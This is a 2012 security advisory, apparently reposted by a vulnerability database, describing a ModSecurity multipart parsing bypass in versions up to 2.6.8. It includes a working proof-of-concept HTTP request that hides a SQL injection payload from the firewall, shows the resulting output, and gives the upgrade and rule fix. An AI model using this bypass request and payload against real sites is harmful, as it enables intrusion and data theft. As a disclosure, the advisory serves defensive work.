SEC Consult SA-20121017-0 :: ModSecurity multipart/invalid part ruleset bypass

2012-10-22T00:00:00
ID SECURITYVULNS:DOC:28658
Type securityvulns
Reporter Securityvulns
Modified 2012-10-22T00:00:00

Description

SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >

          title: ModSecurity multipart/invalid part ruleset bypass
        product: ModSecurity

vulnerable version: <= 2.6.8 fixed version: 2.7.0 CVE number: - impact: Depends what you use it for homepage: http://www.modsecurity.org/ found: 2012-10-12 by: Bernhard Mueller SEC Consult Vulnerability Lab https://www.sec-consult.com =======================================================================

Vendor/product description:

ModSecurity for Apache is a web server plug-in for the Apache web server platform. This is the original, most mature and deployed ModSecurity module. This module is maintained by the Trustwave SpiderLabs Research Team.

URL: http://www.modsecurity.org/projects/modsecurity/apache/

Vulnerability overview/description:

Validation of POST parameters can be bypassed on Apache/PHP installations by sending specially formed multipart requests. A POST parameter's content can be hidden from ModSecurity by prepending an invalid part. This first part contains only a Content-Disposition header and has an additional carriage return inserted at the end of the line ([\r\r\n]). This is followed by a boundary in the next line and another Content-Disposition header with a filename. The request content looks like this (newlines are all \r\n except in line 2).

--A Content-Disposition: form-data; name="id"[\r][\r][\n] --A Content-Disposition: form-data; name="lol"; filename="x"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

--A--

ModSecurity skips what it believes to be an invalid first part and proceeds to parse the second part. This part is treated as a file and not checked against the ruleset.

PHP however treats the whole thing as a single part and processes only the first Content-Disposition header, ignoring the second one. In the opinion of PHP this request contains a POST parameter with the name specified in the first header.

Proof of concept:

wut.php:

<? echo $POST[xxx] ?>

POST request:

POST /wut.php HTTP/1.1 Content-Type: multipart/form-data; boundary=A Content-Length: 161

--A Content-Disposition: form-data; name="xxx"[\r][\r][\n] --A Content-Disposition: form-data; name="yyy"; filename="z"

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

--A--

Output:

1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--

(any change in the header should produce a 403)

Vulnerable / tested versions:

This works with ModSecurity up to version 2.6.8.

Vendor contact timeline:

2012-10-11: Contacted ModSecurity 2012-10-15: ModSecurity guys fixed it 2012-10-16: New ModSecurity release 2.7.0 2012-10-17: Public release of advisory

Solution:

To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure that the MULTIPART_INVALID_PART flag is set in the multipart strict validation rule. Add the line:

IQ %{MULTIPART_INVALID_PART}, \

to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.

Download is available at:

http://www.modsecurity.org/download/

Advisory URL:

https://www.sec-consult.com/en/advisories.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The SEC Consult Group

Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com

Office Singapore 4 Battery Road

25-01 Bank of China Building

Singapore (049908) Mail: office at sec-consult dot sg

Check out our blog at: http://blog.sec-consult.com/

And this thing here: http://wordpress.org/extend/plugins/mvis-security-center/

EOF B. Mueller / October 2012